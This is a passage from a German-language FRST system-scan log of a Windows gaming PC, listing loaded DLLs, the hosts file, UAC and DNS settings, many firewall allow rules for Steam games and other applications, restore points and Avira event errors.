2016-02-10 23:01 - 2016-02-09 05:04 - 00100168 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\libegl.dll
2016-02-10 23:01 - 2016-02-09 05:04 - 29269832 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.109\PepperFlash\pepflashplayer.dll
2015-12-21 22:45 - 2016-01-12 05:43 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2015-12-16 21:37 - 2015-12-15 06:54 - 00782336 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-12-16 21:37 - 2015-07-03 17:12 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-12-16 21:37 - 2016-02-04 22:02 - 02546768 _____ () C:\Program Files (x86)\Steam\video.dll
2015-12-16 21:37 - 2015-07-03 17:12 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-12-16 21:37 - 2015-07-03 17:12 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2015-12-16 21:37 - 2015-09-24 01:33 - 02549248 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2015-12-16 21:37 - 2015-09-24 01:33 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2015-12-16 21:37 - 2015-09-24 01:33 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2015-12-16 21:37 - 2015-09-24 01:33 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2015-12-16 21:37 - 2015-09-24 01:33 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2015-12-16 21:37 - 2016-02-04 22:01 - 00802896 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2015-12-16 21:37 - 2015-12-30 02:51 - 00208896 _____ () C:\Program Files (x86)\Steam\bin\openvr_api.dll
2015-12-16 21:37 - 2016-01-06 02:52 - 48387872 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2015-07-10 23:37 - 2015-07-10 23:37 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2015-10-30 08:24 - 2015-10-30 08:21 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-15253450-2137153623-3730132983-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Hanns\AppData\Roaming\Mozilla\Firefox\Desktop-Hintergrund.bmp
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{1EAC473C-FA1C-426F-BF4C-9AD7909569CE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{803578E2-7173-472C-8E3C-795421980732}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5160117B-5987-49C9-AC37-3ADEFB5C48FB}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{18669D97-94B1-4B7F-A7A7-40D2F00024E6}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{D279C9BA-565A-43E3-AA61-DB5699B3C0D2}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{E18D7105-2D33-45DD-82B0-18C2AF5B52A0}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{7E4274BA-9780-4575-9786-395A420E28BE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{9937E168-7F72-4592-AC78-402FC3683293}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{257ECA36-9B8D-4B31-9B80-26EBABA8B789}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\ASN_App_PcDx9_Final.exe
FirewallRules: [{7872B1CC-A122-43DD-AB25-EA689B55BF3A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\ASN_App_PcDx9_Final.exe
FirewallRules: [{46A9139D-EE95-4484-B24C-72B9CF034F13}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\Launcher.exe
FirewallRules: [{5F8B7434-C958-4905-B228-FE1A81F6ECC8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sonic & All-Stars Racing Transformed\Launcher.exe
FirewallRules: [{B4B45D77-D23E-438C-89BE-B51B4C0DD436}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win_dx9.exe
FirewallRules: [{70A635E4-4D59-4BFC-9686-33AA74D6EE3E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win_dx9.exe
FirewallRules: [{1691828A-7230-414D-9A2B-96A9176E98B3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config_dx9.exe
FirewallRules: [{A161CD64-C8FC-4C27-A664-4D5DD65A14AF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config_dx9.exe
FirewallRules: [{982B0E6B-F295-473E-BB62-74B293CFC41E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win.exe
FirewallRules: [{506CFF18-5D3E-4F51-B818-61121AAFDE87}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\ysf_win.exe
FirewallRules: [{EE725E3F-DBBA-4A2F-80A2-2CB834FEEE50}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config.exe
FirewallRules: [{CF9D7347-1C1A-4711-97D5-92381DEE8E85}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Ys The Oath in Felghana\config.exe
FirewallRules: [{F2062B12-8D24-47F3-AEF9-18A095CFB167}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rogue Legacy\RogueLegacy.exe
FirewallRules: [{290FBBF5-15D4-4144-A6A5-4A39BD1CB108}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rogue Legacy\RogueLegacy.exe
FirewallRules: [{A8315A1C-984C-4B9E-8622-2A3703B0A2BF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Psychonauts\Psychonauts.exe
FirewallRules: [{FF8B00AB-E516-460F-88C4-FD1C932B0C9C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Psychonauts\Psychonauts.exe
FirewallRules: [{DD708F10-099E-48F1-8D91-7EA16BDCD204}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Street Fighter IV - Arcade Edition\SSFIV.exe
FirewallRules: [{5D48DAA4-77C9-458B-8385-83A900D778C1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Super Street Fighter IV - Arcade Edition\SSFIV.exe
FirewallRules: [{0E7C3D47-9652-495E-9012-3D9B943DAE20}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shantae and the Pirate's Curse\ShantaeCurse.exe
FirewallRules: [{D807ED96-9674-405B-9178-2318ED5D9179}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shantae and the Pirate's Curse\ShantaeCurse.exe
FirewallRules: [{805DE47A-E42A-48C2-9BAD-F4E1452F3AF9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Spelunky\Spelunky.exe
FirewallRules: [{EDE5355E-3A91-4C12-9F8C-D30A6376D16F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Spelunky\Spelunky.exe
FirewallRules: [{E0B46C94-26AE-416E-8E8F-72795DD4BF7C}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{D60F6E29-44B1-4DC9-97BC-B23DB52EAC31}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{99E37BF6-B623-475E-903F-F9C18C402273}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{EAA71475-41CD-4245-9F8C-8D75FAFBA2CB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{6684695F-D8F7-40DA-BABC-BAA9ECD0FA21}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{25293322-9D21-4807-9474-5AC9D524CC2A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EAB18391-1B99-43E7-A624-A155122A6243}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{478BF737-6D3D-444C-AFF8-8ACB567BA386}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DrinkBox_Game4\Game.exe
FirewallRules: [{B0316446-E2B3-4023-90A4-9C913ECEF809}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DrinkBox_Game4\Game.exe
FirewallRules: [{B6AED1C1-2ECF-4221-940E-7E43EE4F6289}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Legend of Grimrock\grimrock.exe
FirewallRules: [{FF0ADBD9-F73A-4D25-B8F4-57BC0F59CE49}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Legend of Grimrock\grimrock.exe
FirewallRules: [{4AAC31BB-AE24-4B62-B064-7E84922580FC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Nuclear Throne\nuclearthrone.exe
FirewallRules: [{20C6F0FB-7F37-47EF-9257-95C87D81E3E3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Nuclear Throne\nuclearthrone.exe
FirewallRules: [{8D62E2AC-1CF4-4630-B7F6-5EAB1308B507}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Risk of Rain\Risk of Rain.exe
FirewallRules: [{0F7E170C-7FB4-40AB-8C5E-BBF29D23F042}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Risk of Rain\Risk of Rain.exe
FirewallRules: [{0CE63CE1-90DD-43C2-B8CF-EA2D677523B5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls II Scholar of the First Sin\Game\DarkSoulsII.exe
FirewallRules: [{B0A95B04-B7CF-4A8A-B0F3-3F3D5162C17A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls II Scholar of the First Sin\Game\DarkSoulsII.exe
FirewallRules: [{6CAEB51F-21B5-48BF-979D-06BBA4DEF07D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{57D5B383-DFB1-48D6-8441-B65CFA108F23}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{9FBBB253-DF80-4DC0-A142-528F24610303}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Serious Sam 2\Bin\Sam2.exe
FirewallRules: [{ADF3B96F-78D2-4F33-9399-B32843827D36}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Serious Sam 2\Bin\Sam2.exe
FirewallRules: [{84B65B46-BF39-4D4E-A34E-439951CCF71C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{4F2D3197-EDA1-4AC7-8A67-C1E46D5E9587}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{00EBE37B-BD76-424D-AD77-92F18698F1F6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Volgarr\Volgarr.exe
FirewallRules: [{8A9C04CA-9DFF-45E7-9DCC-A5FE4401EB83}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Volgarr\Volgarr.exe
FirewallRules: [{127DBEC5-737E-4E8C-BC9B-3ABD75CF8B96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{192A8CFD-6765-412E-AD7B-AC3E1D140A5E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2927A427-5D16-4590-9E1D-C1539535ADE4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Machinarium\machinarium.exe
FirewallRules: [{920E24AA-B09E-4601-BF0C-AC4AF32D4C4A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Machinarium\machinarium.exe
FirewallRules: [TCP Query User{F2655CC9-7E76-4CC5-B393-506892F115AF}C:\users\hanns\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\hanns\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{426B7B55-D2B0-4452-8325-9597BA91446F}C:\users\hanns\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\hanns\appdata\roaming\spotify\spotify.exe
FirewallRules: [{342FB7C4-2925-43EF-AB67-F37599A91051}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win64\CMW.exe
FirewallRules: [{BFEB411E-ABE3-4542-B2DC-E029F9140093}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win64\CMW.exe
FirewallRules: [{14EAA340-3C9F-4E93-B7DD-0C047AF4867F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win32\CMW.exe
FirewallRules: [{CFEDE40F-1AA8-4807-939F-41042FFB4D27}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\Binaries\Win32\CMW.exe
FirewallRules: [{8FB0C75B-D040-44C6-86CB-4A613BF879C5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\ChivLauncher.exe
FirewallRules: [{4B9BA1BB-6123-4D2C-A11A-384CE786E33D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfarebeta\ChivLauncher.exe
FirewallRules: [{D9ACFBBC-12E9-4DE0-B2ED-3C719B332E72}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{D12B63F9-4E74-4C48-BCD2-7E4591BBFB52}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{17711669-CD6D-40E5-ACD1-8EC9FCE6D06D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
FirewallRules: [{B53E91E7-7D7E-4DC4-84A2-4695B47B790D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
FirewallRules: [{785F5761-7C62-47C4-93F0-C3AAE808C6D2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{4AD68999-7154-4205-9AAD-F265DF9DC595}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{F5D7ACD7-A77E-48C6-BB3E-ABE979E1A26D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{C5E2AE19-D8AC-4819-A5D8-4AD6BB435966}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{DC0218AF-50B6-4526-B46F-155DC21A92A9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Darksiders\DarksidersPC.exe
FirewallRules: [{0A93A914-348B-4551-8FDE-E60695AAF630}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Darksiders\DarksidersPC.exe
FirewallRules: [{3A2F1D8D-2623-4493-93FB-F5DE5C93FB55}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{5F6E9EC8-6D79-4B46-A0F1-B28C90E696D9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Bioshock\Builds\Release\Bioshock.exe
FirewallRules: [{0EA5B637-0DA7-4A97-8E85-5CD79888CE8A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{EF2C9179-69BC-4DC9-AF01-B304AACD6A5B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{AAF74500-FA72-436C-9D90-A7884E733935}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{C817C1A0-9BE0-418C-A79D-0924F3652977}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
FirewallRules: [{494F18F7-0AF2-48C3-B32E-DC4E36F4A695}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Lego Star Wars Saga\LEGOStarWarsSaga.exe
FirewallRules: [{7ABFBE07-2B9C-45D4-84DA-8BDC90523525}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Lego Star Wars Saga\LEGOStarWarsSaga.exe
FirewallRules: [{1EC2EBE0-2617-471F-A26B-615C48A551AD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Alien Isolation\AI.exe
FirewallRules: [{9EE2DF30-FC77-413A-9B74-E32AE2ACE7B3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Alien Isolation\AI.exe
FirewallRules: [{E6BF45A9-3D83-40E4-964B-4F86B5818621}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BrutalLegend\BrutalLegend.exe
FirewallRules: [{2B90CACD-2717-4D26-AB39-058D812FBB1A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BrutalLegend\BrutalLegend.exe
FirewallRules: [{1AB31C95-8BB4-443C-AC83-C13F30B0E182}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Outlast\OutlastLauncher.exe
FirewallRules: [{EB61ED4C-FA8E-498F-B149-1B115061AF29}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Outlast\OutlastLauncher.exe
FirewallRules: [TCP Query User{7EB0A191-C477-4A69-9ECA-5763427620C6}C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe
FirewallRules: [UDP Query User{C8EBF0D7-AB7B-4587-81BC-9AE980DA249C}C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\outlast\binaries\win64\olgame.exe
FirewallRules: [{4E6937D5-04F5-4539-BEF7-B138490AAD23}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DDDA\DDDA.exe
FirewallRules: [{E4B79FF8-C10A-4939-BFD2-C6DD7A08AD23}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DDDA\DDDA.exe
FirewallRules: [{FC3688E3-900D-4493-9592-60E93E81E569}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dead Space\Dead Space.exe
FirewallRules: [{9541C4B0-A0F1-4CFD-AA7A-A85CA57A81CF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dead Space\Dead Space.exe
FirewallRules: [{DB7F6160-1810-4D3A-AA8A-1DF318D24C39}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StreetFighterVBeta\StreetFighterVBeta.exe
FirewallRules: [{0211DCB6-C60B-47C2-83F8-DE0925A954C0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\StreetFighterVBeta\StreetFighterVBeta.exe
FirewallRules: [{F66B2D58-C6D2-4558-AE2B-72B8CC30F0B2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\dx11\launcher.exe
FirewallRules: [{7ACD2605-EF0E-4237-B834-DACD8F211A1D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\dx11\launcher.exe
FirewallRules: [{2E7752D5-8196-4B4E-9BCF-A348740F032F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\sw.exe
FirewallRules: [{43895C6F-260A-4250-B2FF-012DAC6A5F0A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Shadow Warrior\sw.exe
FirewallRules: [{034CEEEE-CF58-4BDE-80F5-11C56DC3C834}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\HardReset\hardreset.exe
FirewallRules: [{5EB7E1F4-78F6-4CE8-A68F-1B82A146C265}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\HardReset\hardreset.exe
FirewallRules: [{B5F7B177-AD34-4474-8707-35BD69708048}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [{A60E6840-712B-422F-B94D-238CE2C881D3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [{5B6BA538-2A65-4BDC-A1C4-C4F39B9BA112}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win32\UDK.exe
FirewallRules: [{8CA1F704-33D2-41C6-AFD6-713F677C9065}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win32\UDK.exe
FirewallRules: [{71F5EF11-9C08-4E68-9CEC-CCA87E2DA2E3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win64\UDK.exe
FirewallRules: [{1CF74B5E-81F5-4603-9489-52839CE4732A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Viscera Cleanup Detail Shadow Warrior\Binaries\Win64\UDK.exe
FirewallRules: [TCP Query User{4D2A3A39-929A-44C9-BE4B-51D5C9B62F8C}C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe
FirewallRules: [UDP Query User{C587A324-FD38-4A9D-90B9-8935F9B2BDC0}C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\the witcher 2\bin\witcher2.exe
FirewallRules: [{4304BD98-F809-449D-98F4-B2FA301BFB1E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Painkiller Black Edition\Bin\Painkiller.exe
FirewallRules: [{7A4CB929-6DAF-441E-A577-40F19270648D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Painkiller Black Edition\Bin\Painkiller.exe
FirewallRules: [{E23C7F1A-F8ED-43E4-8D99-CE3195C3E57E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\Soma.exe
FirewallRules: [{B152291A-5595-4DD4-9F6D-F095701B770C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\Soma.exe
FirewallRules: [{C8163371-598A-4DAD-BB48-8E4D57CD527C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\ModLauncher.exe
FirewallRules: [{E7347BD0-4112-4D83-9A3A-BA5469DDAC65}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SOMA\ModLauncher.exe
FirewallRules: [{9E90A79A-7621-4EA3-B70E-01DCC9CA0510}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rayman Legends\Rayman Legends.exe
FirewallRules: [{5CC90406-F64C-4F7A-884D-307FFF8F09E1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Rayman Legends\Rayman Legends.exe
FirewallRules: [{C7CCE649-9F95-4854-BB13-F429142519DA}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{EB9B2CD8-885F-4463-9E46-059856A620F2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{50D20954-63AB-469B-AADE-1803D0DD5515}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{7175597E-D585-4038-9B8A-6F621E57BD33}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TowerFall\TowerFall.exe
FirewallRules: [{A5E2973E-EB3A-4D87-A5C1-5FE270B9833F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\TowerFall\TowerFall.exe
FirewallRules: [{29A96D38-8E61-42FC-9BBD-2049BFD8562C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DarkestDungeon\_windows\Darkest.exe
FirewallRules: [{253879B1-73BC-455A-AFAE-6A0A4B462F47}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DarkestDungeon\_windows\Darkest.exe
FirewallRules: [{0CD7AFDF-F517-4C92-8F8E-24FF3D0FB4B9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sega Classics\SEGAGenesisClassics.exe
FirewallRules: [{BB4BD88E-AC21-4330-A63A-B523186D8360}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Sega Classics\SEGAGenesisClassics.exe
FirewallRules: [{94C00BF3-6892-40F5-BA09-EDE927FFFD56}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hell Yeah\HELLYEAH.exe
FirewallRules: [{9F57C3AA-5DEF-478F-9238-502399737614}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hell Yeah\HELLYEAH.exe
FirewallRules: [{11D8E4FE-95D0-42CA-BD4A-76A2366B9B8F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Jet Set Radio\jsrsetup.exe
FirewallRules: [{EB4563A3-8129-4CB2-9DAA-5A95523351B0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Jet Set Radio\jsrsetup.exe
FirewallRules: [{5060C703-A91F-4345-8415-0C89464D844F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dont_starve\bin\dontstarve_steam.exe
FirewallRules: [{65BAA918-D2EA-4162-AC02-D81D0A62B05A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dont_starve\bin\dontstarve_steam.exe
FirewallRules: [{EF8DA61F-1B7D-4363-A56F-BE332C7DF84B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [{BA34C35E-3197-4F29-B5C9-A46080321836}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\rocketleague\Binaries\Win32\RocketLeague.exe

==================== Wiederherstellungspunkte =========================

17-02-2016 07:27:29 DirectX wurde installiert
24-02-2016 20:34:02 Geplanter Prüfpunkt
27-02-2016 18:55:58 Wiederherstellungsvorgang

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (02/27/2016 07:43:32 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:14:34 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:11:07 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:10:55 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:10:19 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:10:05 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

Error: (02/27/2016 07:09:39 PM) (Source: Avira Antivirus) (EventID: 4117) (User: NT-AUTORITÄT)
Description: 0x0

